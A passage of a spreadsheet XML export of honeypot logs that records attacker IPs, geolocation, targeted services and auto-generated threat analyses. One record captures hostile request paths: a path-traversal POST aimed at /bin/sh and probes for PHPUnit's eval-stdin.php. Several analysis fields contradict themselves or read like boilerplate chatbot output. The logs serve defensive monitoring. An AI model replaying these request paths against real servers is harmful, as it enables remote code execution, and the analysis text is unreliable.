    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;15882&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Trivandrum"/>
    <s v="Thiruvananthapuram (Technopark Campus)"/>
    <s v="1254163"/>
    <s v="695034"/>
    <s v="8.5581"/>
    <s v="76.8816"/>
    <s v="17465"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:caa4:9b92"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No information is available for analysis. _x000a__x000a_Malicious activity could be related to unauthorized access, probing or scanning of network services. _x000a_System may have been targeted by an attacker attempting to exploit vulnerabilities."/>
    <m/>
  </r>
  <r>
    <x v="619"/>
    <x v="619"/>
    <s v="NA&amp;&amp;vmi2457620.contaboserver.net"/>
    <x v="0"/>
    <d v="2025-04-28T02:14:27"/>
    <d v="2025-04-25T19:16:12"/>
    <d v="2025-04-28T02:14:27"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTPS_H33"/>
    <s v="23&amp;&amp;443&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.35208"/>
    <s v="103.82"/>
    <s v="141995"/>
    <s v="Contabo Asia Private Limited"/>
    <s v="Contabo Asia Private Limited"/>
    <s v="hosting"/>
    <s v="Contabo GmbH"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '103', 'Content-Type': 'text/plain', 'Host': '5.181.21.224:443', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'POST', 'uri': '/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '5.181.21.224:443', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '5.181.21.224:443', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6d7b:eb8a"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <s v="No TELNET activity detected, indicating no malicious attempt to exploit this service. However, it does not necessarily indicate security or lack thereof, as the honeypot might simply be inactive for this particular service. This could be a false negative. &amp;&amp; No activity detected for TELNET service, indicating that it was likely targeted or scanned but did not result in any connection attempt or successful access to the system. This could indicate reconnaissance attempts by malicious actors checking for open services. No actual malicious traffic was sent over this specific service. &amp;&amp; No HTTPS traffic detected, indicating potential probing or reconnaissance activity. No malicious actions have been initiated via HTTPS, suggesting a possible scan or reconnaissance attempt. No further action has been taken via this protocol. &amp;&amp; No recent HTTPS activity was detected, suggesting potential evasion or attempts to avoid detection. Malicious actors may try to hide their activities by using different protocols or ports. This could be a sign of sophisticated attackers trying to stay under the radar. &amp;&amp; A GET request is made to a PHP file, potentially used for code execution or as a backdoor. The request comes from an unusual user agent and a specific IP address. This could be an attempt to exploit vulnerabilities in the server's software. &amp;&amp; An unknown user is making a GET request to a suspicious PHP file, possibly attempting to execute malicious code. The request originates from an IP address that has not been seen before. This could be an attempt to exploit a vulnerability in the system. &amp;&amp; This data suggests a potential attempt to execute arbitrary code on the targeted server, likely through a vulnerability in the PHPUnit library. The malicious actor is attempting to access a specific PHP file that can be used for code injection. This behavior indicates a possible Remote Code Execution (RCE) attack. &amp;&amp; This data suggests a potential reconnaissance or exploitation attempt, as it targets a PHP script that can evaluate user input. The activity likely aims to exploit the script for malicious purposes. It may be related to a known vulnerability in the PHP framework. &amp;&amp; No log data provided, unable to analyze. _x000a__x000a_However, if you provide some sample log data I can help explain possible malicious activity."/>
    <s v="Port Scan &amp;&amp; Telnet Scan &amp;&amp; Unknown HTTPS &amp;&amp; Connection Failure &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="620"/>
    <x v="620"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T02:11:52"/>
    <d v="2024-07-08T17:41:00"/>
    <d v="2025-04-28T02:11:52"/>
    <n v="790"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_TELNET_H6"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;110&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Toegye-ro)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5614"/>
    <s v="126.996"/>
    <s v="9318"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="business"/>
    <s v="broadNnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:76dd:7376"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="This log data indicates a possible attempt to connect to an open port but specific details are missing, making it difficult to determine the nature of the activity. The lack of information suggests that the connection was either denied or the attacker was unable to provide sufficient credentials for access. Without further context, the true intentions behind this action cannot be determined. &amp;&amp; No log data provided, cannot analyze malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="621"/>
    <x v="621"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T01:33:02"/>
    <d v="2025-04-28T01:33:02"/>
    <d v="2025-04-28T01:33:02"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:f8c9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The data indicates an unsuccessful attempt to connect via TELNET, suggesting an attempt by a malicious entity to gain unauthorized access to a service. The fact that it was unable to establish a connection may indicate a failed brute-force attack or a blocked IP address. This could be indicative of malicious activity attempting to exploit vulnerabilities in the system. &amp;&amp; There is no log activity detected for Telnet service, suggesting a lack of malicious attempts so far. _x000a_No suspicious traffic has been observed for this particular service._x000a_The situation remains calm and no alerts have been triggered yet."/>
    <m/>
  </r>
  <r>
    <x v="622"/>
    <x v="622"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T00:38:17"/>
    <d v="2025-04-28T00:38:17"/>
    <d v="2025-04-28T00:38:17"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AE"/>
    <s v="United Arab Emirates"/>
    <s v="DU"/>
    <s v="Dubai"/>
    <s v="NA"/>
    <s v="Bur Dubai"/>
    <s v="7289825"/>
    <s v="NA"/>
    <s v="25.2604"/>
    <s v="55.2989"/>
    <s v="5384"/>
    <s v="EMIRATES-INTERNET"/>
    <s v="Emirates Telecommunications Group Company (Etisalat Group) Pjsc"/>
    <s v="consumer"/>
    <s v="Emirates Telecommunications Corporation"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/135.0.7049.83 Mobile/15E148 Safari/604.1}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:230:e35b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="623"/>
    <x v="623"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T00:19:31"/>
    <d v="2025-04-28T00:19:31"/>
    <d v="2025-04-28T00:19:31"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="OM"/>
    <s v="Oman"/>
    <s v="MA"/>
    <s v="Muscat"/>
    <s v="NA"/>
    <s v="Muscat"/>
    <s v="287286"/>
    <s v="135"/>
    <s v="23.588"/>
    <s v="58.3829"/>
    <s v="204170"/>
    <s v="awasr"/>
    <s v="Awaser Oman LLC"/>
    <s v="corporate"/>
    <s v="Awasr Oman"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/27.0 Chrome/125.0.0.0 Mobile Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:26fd:dce4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <s v="A user is attempting to login to a system using an HTTP request with a suspicious browser string that may be attempting to disguise its true nature. The browser string includes AppleWebKit and Safari, which are commonly used in legitimate browsers but can also be faked by malicious software. This could potentially indicate a brute force or automated attack. &amp;&amp; A user with the browser string &quot;Mozilla/5.0&quot; is attempting to log in using HTTP login credentials likely using a bot or automated script as the browser string seems suspicious and not typical of a human user. This could be an automated attack attempting to gain unauthorized access to a service. The browser string suggests a high likelihood of malicious intent. &amp;&amp; An attempt to login using a fake user agent string, likely attempting to evade detection or hide identity. The user agent string is suspiciously generic and does not match the typical characteristics of mobile browsers from that brand. This could be an automated script trying to gain unauthorized access. &amp;&amp; The log data indicates an HTTP login attempt from a mobile device running Android 10 using the SamsungBrowser app and a modified version of Google Chrome. This could be a malicious actor attempting to access restricted resources. The unusual browser combination may suggest a custom or spoofed user agent."/>
    <m/>
  </r>
  <r>
    <x v="624"/>
    <x v="624"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T00:10:13"/>
    <d v="2025-01-12T19:39:58"/>
    <d v="2025-04-28T00:10:13"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="23&amp;&amp;389&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="NA"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.2252600000000005"/>
    <s v="106.817"/>
    <s v="9905"/>
    <s v="Linknet ASN"/>
    <s v="PT. First Media, Tbk"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8bff:c012"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="There is insufficient log data to analyze any potential malicious activity. No suspicious connections or requests have been detected. Normal system operation continues without issue."/>
    <m/>
  </r>
  <r>
    <x v="625"/>
    <x v="625"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T00:06:45"/>
    <d v="2025-04-28T00:06:45"/>
    <d v="2025-04-28T00:06:45"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:8365"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No Telnet activity detected, potentially indicating an attempt to exploit service or scan for vulnerabilities. This could be part of reconnaissance before launching further attacks or probing system weaknesses. No actual malicious action occurred, just a possible intent. &amp;&amp; The data indicates that there was an attempt to connect to a telnet service but the connection was not established as the response is marked as &quot;Not Available&quot;. The potential malicious activity could be a scan or reconnaissance attempt by an attacker. This attempt may have been part of a larger attack on the system."/>
    <m/>
  </r>
  <r>
    <x v="626"/>
    <x v="626"/>
    <s v="ec2-13-218-48-251.compute-1.amazonaws.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-27T23:19:29"/>
    <d v="2025-04-27T22:54:25"/>
    <d v="2025-04-27T23:19:29"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Loudoun"/>
    <s v="Ashburn"/>
    <s v="4744870"/>
    <s v="20149"/>
    <s v="39.0438"/>
    <s v="-77.4874"/>
    <s v="14618"/>
    <s v="Amazon.com, Inc."/>
    <s v="Amazon.com, Inc."/>
    <s v="hosting"/>
    <s v="Amazon Technologies Inc"/>
    <s v="2019-10-01"/>
    <s v="AT-88-Z"/>
    <s v="2021-02-10"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dda:30fb"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No notable activity detected, possibly indicating the service is idle or down. No connections were made to the HTTPS port during this time period. Data is unavailable for analysis. &amp;&amp; The data indicates an attempt to connect to an HTTPS service, suggesting a potential port scanning or reconnaissance activity. The fact that there is no connection established implies the target may be aware of the scan and has blocked access. This could be indicative of initial stages of a larger attack."/>
    <s v="Unknown Access &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="627"/>
    <x v="627"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T23:15:30"/>
    <d v="2025-04-27T23:15:30"/>
    <d v="2025-04-27T23:15:30"/>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d8:185e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No telnet connections were detected from this IP address. _x000a_This suggests that the user may be attempting to access a service using an alternative method or protocol. _x000a_The lack of a connection attempt implies no malicious activity was observed. &amp;&amp; No TELNET activity detected, possible indication of legitimate service being idle or not utilized. This could be normal if no connections were attempted. It also does not indicate any malicious activity was attempted on this service."/>
    <m/>
  </r>
  <r>
    <x v="628"/>
    <x v="628"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T22:39:41"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-27T22:39:41"/>
    <n v="98"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_DNS_H11&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;51923"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2010-08-02"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e2e:f260"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="629"/>
    <x v="629"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T22:35:35"/>
    <d v="2025-04-27T10:17:27"/>
    <d v="2025-04-27T22:35:35"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>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2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b62:e388"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET activity was detected, indicating this service is likely idle or not being targeted by malicious actors. _x000a_TELNET is an old protocol that can be used for malicious purposes such as brute force attacks._x000a_This lack of activity could also indicate the service is disabled or not in use. &amp;&amp; No TELNET activity detected, which could indicate that an attacker is using evasion techniques to avoid detection. This lack of activity might suggest that the malicious actor has abandoned their attempt or is waiting for a more opportune time to strike. The absence of TELNET interaction may also imply that the attacker is utilizing alternative means of communication."/>
    <m/>
  </r>
  <r>
    <x v="630"/>
    <x v="630"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T22:11:15"/>
    <d v="2023-12-02T07:30:00"/>
    <d v="2025-04-27T22:11:15"/>
    <n v="380"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;17700&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:eee:275a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze any possible malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="631"/>
    <x v="631"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T22:04:13"/>
    <d v="2025-04-27T10:37:21"/>
    <d v="2025-04-27T22:04:13"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23"/>
    <s v="True"/>
